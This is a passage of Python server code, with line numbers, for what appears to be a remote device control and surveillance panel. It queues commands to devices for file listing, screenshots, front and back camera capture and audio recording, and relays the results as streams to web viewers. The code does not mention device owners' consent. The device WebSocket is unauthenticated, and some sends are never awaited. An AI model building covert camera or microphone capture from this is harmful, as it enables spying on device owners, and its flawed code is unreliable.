   941→    if not device:
   942→        return json_response({"ok": False, "message": "Device not found"}, 404)
   943→    
   944→    queued = await store.queue_command(
   945→        device_id=device_id,
   946→        command="list_files",
   947→        params={"path": path},
   948→        requested_by=session['user_id'],
   949→        source="web"
   950→    )
   951→    
   952→    if _fb.firebase_connected:
   953→        await push_command(device_id, {
   954→            "id": queued['id'],
   955→            "command": "list_files",
   956→            "params": {"path": path},
   957→            "created_at": queued['created_at'],
   958→        })
   959→    
   960→    return json_response({"ok": True, "command": queued, "message": "Command queued"})
   961→
   962→
   963→# ─── Streaming API ────────────────────────────────────────────
   964→
   965→async def api_stream_frame(request: web.Request) -> web.Response:
   966→    session = get_auth_session(request)
   967→    if not session:
   968→        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   969→    
   970→    device_id = request.match_info.get('device_id', '')
   971→    stream_type = request.query.get('type', 'video')
   972→    key = f"{device_id}:{stream_type}"
   973→    
   974→    frame = store.latest_frames.get(key)
   975→    if not frame:
   976→        return json_response({"ok": False, "message": "No frame available"}, 404)
   977→    
   978→    return json_response({
   979→        "ok": True,
   980→        "data": frame.get('data', ''),
   981→        "timestamp": frame.get('timestamp', 0),
   982→        "source": frame.get('source', ''),
   983→    })
   984→
   985→
   986→async def api_stream_status(request: web.Request) -> web.Response:
   987→    session = get_auth_session(request)
   988→    if not session:
   989→        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   990→    
   991→    streams = {}
   992→    for key, info in store.jpeg_stream_info.items():
   993→        if info.get('active'):
   994→            streams[key] = info
   995→    
   996→    return json_response({"ok": True, "streams": streams})
   997→
   998→
   999→async def api_stream_start(request: web.Request) -> web.Response:
  1000→    """Device notifies server that a stream started."""
  1001→    device_id, error = get_device_auth(request)
  1002→    if error:
  1003→        return json_response({"ok": False, "message": error}, 401)
  1004→    
  1005→    try:
  1006→        body = await request.json()
  1007→    except:
  1008→        body = {}
  1009→    
  1010→    stream_id = body.get('stream_id', '')
  1011→    stream_type = body.get('type', 'screen')
  1012→    
  1013→    store.jpeg_stream_info[device_id] = {
  1014→        "active": True,
  1015→        "type": stream_type,
  1016→        "stream_id": stream_id,
  1017→        "started_at": datetime.utcnow().isoformat(),
  1018→    }
  1019→    
  1020→    return json_response({"ok": True})
  1021→
  1022→
  1023→async def api_stream_stop(request: web.Request) -> web.Response:
  1024→    """Device notifies server that a stream stopped."""
  1025→    device_id, error = get_device_auth(request)
  1026→    if error:
  1027→        return json_response({"ok": False, "message": error}, 401)
  1028→    
  1029→    if device_id in store.jpeg_stream_info:
  1030→        store.jpeg_stream_info[device_id]['active'] = False
  1031→    
  1032→    return json_response({"ok": True})
  1033→
  1034→
  1035→async def api_jpeg_stream_start(request: web.Request) -> web.Response:
  1036→    """Start JPEG screenshot-based streaming (web/admin)."""
  1037→    session = get_auth_session(request)
  1038→    if not session:
  1039→        return json_response({"ok": False, "message": "Unauthorized"}, 401)
  1040→    
  1041→    try:
  1042→        body = await request.json()
  1043→    except:
  1044→        return json_response({"ok": False, "message": "Invalid JSON"}, 400)
  1045→    
  1046→    device_id = body.get('device_id', '')
  1047→    stream_type = body.get('type', 'screen')
  1048→    interval = body.get('interval', JPEG_STREAM_INTERVAL)
  1049→    
  1050→    if not device_id:
  1051→        return json_response({"ok": False, "message": "Missing device_id"}, 400)
  1052→    
  1053→    # Check if already streaming
  1054→    if device_id in store.jpeg_stream_tasks and not store.jpeg_stream_tasks[device_id].done():
  1055→        return json_response({"ok": False, "message": "Stream already active"}, 400)
  1056→    
  1057→    # Start JPEG stream loop
  1058→    async def jpeg_loop():
  1059→        cmd = "screenshot" if stream_type == "screen" else "front_camera"
  1060→        if stream_type == "back_camera":
  1061→            cmd = "back_camera"
  1062→        elif stream_type == "audio":
  1063→            cmd = "record_audio"
  1064→        
  1065→        store.jpeg_stream_info[device_id] = {
  1066→            "active": True,
  1067→            "type": stream_type,
  1068→            "interval": interval,
  1069→            "started_at": datetime.utcnow().isoformat(),
  1070→            "frame_count": 0,
  1071→        }
  1072→        
  1073→        while store.jpeg_stream_info.get(device_id, {}).get('active', False):
  1074→            try:
  1075→                queued = await store.queue_command(
  1076→                    device_id=device_id,
  1077→                    command=cmd,
  1078→                    params={},
  1079→                    requested_by=session['user_id'],
  1080→                    source="jpeg_stream"
  1081→                )
  1082→                
  1083→                if _fb.firebase_connected:
  1084→                    await push_command(device_id, {
  1085→                        "id": queued['id'],
  1086→                        "command": cmd,
  1087→                        "params": {},
  1088→                        "created_at": queued['created_at'],
  1089→                    })
  1090→                
  1091→                store.jpeg_stream_info[device_id]['frame_count'] = \
  1092→                    store.jpeg_stream_info[device_id].get('frame_count', 0) + 1
  1093→                
  1094→                await asyncio.sleep(interval)
  1095→            except asyncio.CancelledError:
  1096→                break
  1097→            except Exception as e:
  1098→                logger.error(f"JPEG stream error: {e}")
  1099→                await asyncio.sleep(5)
  1100→    
  1101→    store.jpeg_stream_tasks[device_id] = asyncio.create_task(jpeg_loop())
  1102→    return json_response({"ok": True, "message": "Stream started"})
  1103→
  1104→
  1105→async def api_jpeg_stream_stop(request: web.Request) -> web.Response:
  1106→    """Stop JPEG streaming."""
  1107→    session = get_auth_session(request)
  1108→    if not session:
  1109→        return json_response({"ok": False, "message": "Unauthorized"}, 401)
  1110→    
  1111→    try:
  1112→        body = await request.json()
  1113→    except:
  1114→        body = {}
  1115→    
  1116→    device_id = body.get('device_id', '')
  1117→    
  1118→    if device_id in store.jpeg_stream_info:
  1119→        store.jpeg_stream_info[device_id]['active'] = False
  1120→    
  1121→    # Send stop command
  1122→    if device_id in store.jpeg_stream_tasks and not store.jpeg_stream_tasks[device_id].done():
  1123→        store.jpeg_stream_tasks[device_id].cancel()
  1124→    
  1125→    return json_response({"ok": True, "message": "Stream stopped"})
  1126→
  1127→
  1128→# ─── WebSocket Handlers ───────────────────────────────────────
  1129→
  1130→async def ws_dashboard(request: web.Request) -> web.Response:
  1131→    """Dashboard real-time updates WebSocket."""
  1132→    token = request.query.get('token', '')
  1133→    session = store.validate_session(token)
  1134→    if not session:
  1135→        return web.Response(status=401, text="Unauthorized")
  1136→    
  1137→    ws = web.WebSocketResponse(heartbeat=30)
  1138→    await ws.prepare(request)
  1139→    store.dashboard_ws_clients.add(ws)
  1140→    
  1141→    try:
  1142→        # Send initial data
  1143→        stats = store.get_stats()
  1144→        devices = await store.get_user_devices(session['user_id'])
  1145→        await ws.send_json({
  1146→            "type": "init",
  1147→            "devices": devices,
  1148→            "stats": stats,
  1149→            "commands": COMMAND_REGISTRY,
  1150→            "categories": CMD_CATEGORIES,
  1151→        })
  1152→        
  1153→        async for msg in ws:
  1154→            if msg.type == WSMsgType.TEXT:
  1155→                if msg.data == "ping":
  1156→                    await ws.send_json({"type": "pong"})
  1157→                elif msg.data == "get_stats":
  1158→                    await ws.send_json({"type": "stats_update", "stats": store.get_stats()})
  1159→            elif msg.type in (WSMsgType.ERROR, WSMsgType.CLOSE):
  1160→                break
  1161→    except Exception:
  1162→        pass
  1163→    finally:
  1164→        store.dashboard_ws_clients.discard(ws)
  1165→    
  1166→    return ws
  1167→
  1168→
  1169→async def ws_stream(request: web.Request) -> web.Response:
  1170→    """Device streaming WebSocket."""
  1171→    device_id = request.query.get('device_id', '')
  1172→    stream_id = request.query.get('stream_id', '')
  1173→    
  1174→    ws = web.WebSocketResponse(heartbeat=10)
  1175→    await ws.prepare(request)
  1176→    
  1177→    key = f"{device_id}:{stream_id}"
  1178→    store.stream_connections[key] = {"ws": ws, "type": "device", "last_activity": time.time()}
  1179→    
  1180→    try:
  1181→        async for msg in ws:
  1182→            if msg.type == WSMsgType.BINARY:
  1183→                # Video/audio frame from device
  1184→                store.latest_frames[f"{device_id}:video"] = {
  1185→                    "data": msg.data if isinstance(msg.data, str) else "",
  1186→                    "timestamp": time.time(),
  1187→                    "source": "stream",
  1188→                }
  1189→                
  1190→                # Forward to any viewer
  1191→                for conn_key, conn in list(store.stream_connections.items()):
  1192→                    if conn.get('type') == 'viewer' and conn.get('target_stream') == stream_id:
  1193→                        try:
  1194→                            if conn.get('ws') and not conn['ws'].closed:
  1195→                                conn['ws'].send_bytes(msg.data)
  1196→                        except Exception:
  1197→                            pass
  1198→                
  1199→                store.stream_connections[key]['last_activity'] = time.time()
  1200→            
  1201→            elif msg.type == WSMsgType.TEXT:
  1202→                try:
  1203→                    data = json.loads(msg.data)
  1204→                    msg_type = data.get('type', '')
  1205→                    
  1206→                    if msg_type == 'config':
  1207→                        store.jpeg_stream_info[device_id] = data
  1208→                    
  1209→                    elif msg_type == 'frame':
  1210→                        # Base64 frame
  1211→                        frame_data = data.get('data', '')
  1212→                        if frame_data:
  1213→                            store.latest_frames[f"{device_id}:video"] = {
  1214→                                "data": frame_data,
  1215→                                "timestamp": time.time(),
  1216→                                "source": data.get('source', 'stream'),
  1217→                                "is_keyframe": data.get('is_keyframe', False),
  1218→                            }
  1219→                            # Forward to viewers
  1220→                            for conn_key, conn in list(store.stream_connections.items()):
  1221→                                if conn.get('type') == 'viewer' and conn.get('target_stream') == stream_id:
  1222→                                    try:
  1223→                                        if conn.get('ws') and not conn['ws'].closed:
  1224→                                            conn['ws'].send_json(data)
  1225→                                    except Exception:
  1226→                                        pass
  1227→                except json.JSONDecodeError:
  1228→                    pass
  1229→            
  1230→            elif msg.type in (WSMsgType.ERROR, WSMsgType.CLOSE):
  1231→                break
  1232→    except Exception:
  1233→        pass
  1234→    finally:
  1235→        store.stream_connections.pop(key, None)
  1236→        if device_id in store.jpeg_stream_info:
  1237→            store.jpeg_stream_info[device_id]['active'] = False
  1238→    
  1239→    return ws
  1240→
  1241→
  1242→async def ws_stream_viewer(request: web.Request) -> web.Response:
  1243→    """Viewer WebSocket for watching streams."""
  1244→    stream_id = request.query.get('stream_id', '')
  1245→    token = request.query.get('token', '')
  1246→    session = store.validate_session(token)
  1247→    if not session:
  1248→        return web.Response(status=401, text="Unauthorized")
  1249→    
  1250→    ws = web.WebSocketResponse(heartbeat=10)
  1251→    await ws.prepare(request)
  1252→    
  1253→    key = f"viewer_{stream_id}_{id(ws)}"
  1254→    store.stream_connections[key] = {
  1255→        "ws": ws,
  1256→        "type": "viewer",
  1257→        "target_stream": stream_id,
  1258→        "last_activity": time.time(),
  1259→    }
  1260→    
  1261→    try:
  1262→        async for msg in ws:
  1263→            if msg.type == WSMsgType.TEXT:
  1264→                try:
  1265→                    data = json.loads(msg.data)
  1266→                    # Forward control commands to device stream
  1267→                    for conn_key, conn in list(store.stream_connections.items()):
  1268→                        if conn.get('type') == 'device' and stream_id in conn_key:
  1269→                            try:
  1270→                                if conn.get('ws') and not conn['ws'].closed:
  1271→                                    conn['ws'].send_json(data)
  1272→                            except Exception:
  1273→                                pass
  1274→                except json.JSONDecodeError:
  1275→                    pass
  1276→            elif msg.type in (WSMsgType.ERROR, WSMsgType.CLOSE):
  1277→                break
  1278→    except Exception:
  1279→        pass
  1280→    finally:
  1281→        store.stream_connections.pop(key, None)
  1282→    
  1283→    return ws
  1284→
  1285→
  1286→# ─── Dashboard Push Loop ──────────────────────────────────────
  1287→
  1288→async def dashboard_push_loop():
  1289→    """Push stats updates to connected dashboard WebSockets."""
  1290→    while True:
  1291→        try:
  1292→            await asyncio.sleep(4)
  1293→            if not store.dashboard_ws_clients:
  1294→                continue
  1295→            
  1296→            stats = store.get_stats()
  1297→            dead = set()
  1298→            
  1299→            for ws in store.dashboard_ws_clients:
  1300→                try:
  1301→                    if ws.closed:
  1302→                        dead.add(ws)
  1303→                        continue
  1304→                    await ws.send_json({"type": "stats_update", "stats": stats})
  1305→                except Exception:
  1306→                    dead.add(ws)
  1307→            
  1308→            store.dashboard_ws_clients -= dead
  1309→        except asyncio.CancelledError:
  1310→            break
  1311→        except Exception:
  1312→            await asyncio.sleep(5)